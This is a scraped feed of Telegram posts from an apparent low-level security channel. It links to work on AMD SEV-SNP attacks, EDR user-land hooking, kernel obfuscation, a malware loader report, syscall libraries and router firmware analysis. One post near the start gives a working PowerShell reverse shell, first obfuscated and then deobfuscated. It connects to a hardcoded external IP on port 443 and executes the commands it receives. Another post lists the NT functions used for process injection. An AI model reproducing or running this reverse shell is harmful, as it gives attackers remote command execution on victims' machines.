How a Catch-22 Breaks AMD SEV-SNP
(ACM CCS 2025)
(ACM CCS 2025)
#amd #sev_snp #os_internals
@ZwLowLevel
https://rmpocalypse.github.io/rmpocalypse-CCS2025.pdf
RMPocalypse Attack
How A Catch-22 Breaks AMD SEV-SNP
${1}='62'+'.113'+'.66'+'.7';${2}=4*100+43;${3}='Ne'+'t.'+'Soc'+'ket'+'s.'+'Tcp'+'Cli'+'ent';${4}=new-object ${3}(${1},${2});${5}=${4}.GetStream();[byte[]]${6}=0..(8*1024-1)|%{0};while((${7}=${5}.Read(${6},0,${6}.Length)) -ne 0){${8}=[System.Text.Encoding]::ASCII.GetString(${6},0,${7});${9}=([System.Management.Automation.PowerShell]::Create()).AddScript(${8}).Invoke()|Out-String 2>&1|out-string;${10}=[System.Text.Encoding]::ASCII.GetBytes(${9});${5}.Write(${10},0,${10}.Length);${5}.Flush()};${4}.Close()Ahora desofuscado:
$ip = "62.113.66.7"
$port = 443
$client = New-Object Net.Sockets.TcpClient($ip, $port)
$stream = $client.GetStream()
[byte[]]$buffer = 0..8191 | ForEach-Object { 0 }
while (($bytesRead = $stream.Read($buffer, 0, $buffer.Length)) -ne 0) {
$command = [System.Text.Encoding]::ASCII.GetString($buffer, 0, $bytesRead)
$result = ([System.Management.Automation.PowerShell]::Create()).AddScript($command).Invoke() | Out-String
$bytes = [System.Text.Encoding]::ASCII.GetBytes($result)
$stream.Write($bytes, 0, $bytes.Length)
$stream.Flush()
}
$client.Close()
@ZwLowLevel
Please open Telegram to view this post
VIEW IN TELEGRAM
Se pueden observar las anomalías del stack frame cuando se hace uso de la librería de Detours para implementar user land hooks. En este contexto, se implementan hooks en MessageBoxW, poco realista en el mundo real para los proveedores de seguridad, pero en un contexto real, los EDR despliegan sensores para monitorear las llamadas a las funciones nativas (Nt*) en una variedad de contextos, como por ejemplo:
Funciones para la injeccion de procesos:
El mapeo de objetos de sesión en memoria:
@ZwLowLevel
En resumen, aunque los proveedores de seguridad utilizan una variedad de sensores para recolectar telemetría en un entorne, el hooking hoy en día sigue siendo un método poderoso para identificar un call stack anómalo.
Funciones para la injeccion de procesos:
NtOpenProcess
NtAllocateVirtualMemory
NtWriteVirtualMemory
NtCreateThreadEx
El mapeo de objetos de sesión en memoria:
NtCreateSection
NtMapViewOfSection
NtUnmapViewOfSection
@ZwLowLevel
En resumen, aunque los proveedores de seguridad utilizan una variedad de sensores para recolectar telemetría en un entorne, el hooking hoy en día sigue siendo un método poderoso para identificar un call stack anómalo.
This project demonstrates CodeDefenders ability to obfuscate kernel and bootloader files. The modified system includes obfuscated critical system functions and bypassed security mechanisms.
#low_level #windows_kernel #windows_internals #uefi #bootloader
@ZwLowLevel
https://github.com/codedefender-io/windows
Please open Telegram to view this post
VIEW IN TELEGRAM
#loader #crypter #edr_bypass #malware #ppl
@ZwLowLevel
https://www.elastic.co/security-labs/roningloader
Please open Telegram to view this post
VIEW IN TELEGRAM
www.elastic.co
RONINGLOADER: DragonBreath’s New Path to PPL Abuse — Elastic Security Labs
Elastic Security Labs uncovers RONINGLOADER, a multi-stage loader deploying DragonBreath’s updated gh0st RAT variant. The campaign weaponizes signed drivers, thread-pool injection, and PPL abuse to disable Defender and evade Chinese EDR tools.
#xbox360 #os_internals #debugging #low_level
@ZwLowLevel
https://randomascii.wordpress.com/2018/01/07/finding-a-cpu-design-bug-in-the-xbox-360/
Please open Telegram to view this post
VIEW IN TELEGRAM
Random ASCII - tech blog of Bruce Dawson
Finding a CPU Design Bug in the Xbox 360
The recent reveal of Meltdown and Spectre reminded me of the time I found a related design bug in the Xbox 360 CPU – a newly added instruction whose mere existence was dangerous. Back in 2005 I was…
This media is not supported in your browser
VIEW IN TELEGRAM
#macos #ios #reverse_engineering #reversing
@ZwLowLevel
https://hexai.re/blog/reversing-swift-like-a-pro
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Header‑only C++ library for Native API syscall invocation on x64 Windows
#syscall #windows_internals #ntapi
@ZwLowLevel
https://github.com/wufhex/Syscaller
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - wufhex/Syscaller: Header‑only C++ library for Native API syscall invocation on x64 Windows
Header‑only C++ library for Native API syscall invocation on x64 Windows - wufhex/Syscaller
#amr64 #os_internals #raspberry
@ZwLowLevel
https://ohyaan.github.io/assembly/introduction_to_arm64_assembly_on_raspberry_pi/
Please open Telegram to view this post
VIEW IN TELEGRAM
Raspberry Pi Complete Guide
Raspberry Pi User Guide - Complete Tutorials and Tips
Master Raspberry Pi with our comprehensive guides covering setup, programming, troubleshooting, and advanced projects.
#android #framework
@ZwLowLevel
https://github.com/AlbatrossHook/AlbatrossServer
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - AlbatrossHook/AlbatrossServer: Albatross Server is the core component of the Albatross dynamic instrumentation tool. It…
Albatross Server is the core component of the Albatross dynamic instrumentation tool. It enables Albatross not only to be packaged into an app but also to be dynamically injected. It is responsible...
Forwarded from Golden Byte
🛜 TP-Link-TL-WA1201-Vulnerability-Analysis
Hardware Teardown and Firmware Vulnerability Analysis
Hardware Teardown and Firmware Vulnerability Analysis
#firmware_hacking #firmware_analysis #hardware_hacking #reverse_engineering
@ZwLowLevel
https://github.com/codyaj/TP-Link-TL-WA1201-Vulnerability-Analysis
GitHub
GitHub - codyaj/TP-Link-TL-WA1201-Vulnerability-Analysis: Hardware & firmware security analysis of the TP-Link AC1200. Gained root…
Hardware & firmware security analysis of the TP-Link AC1200. Gained root shell via UART & U-Boot to dump firmware for vulnerability research. - codyaj/TP-Link-TL-WA1201-Vulnerability-Analysis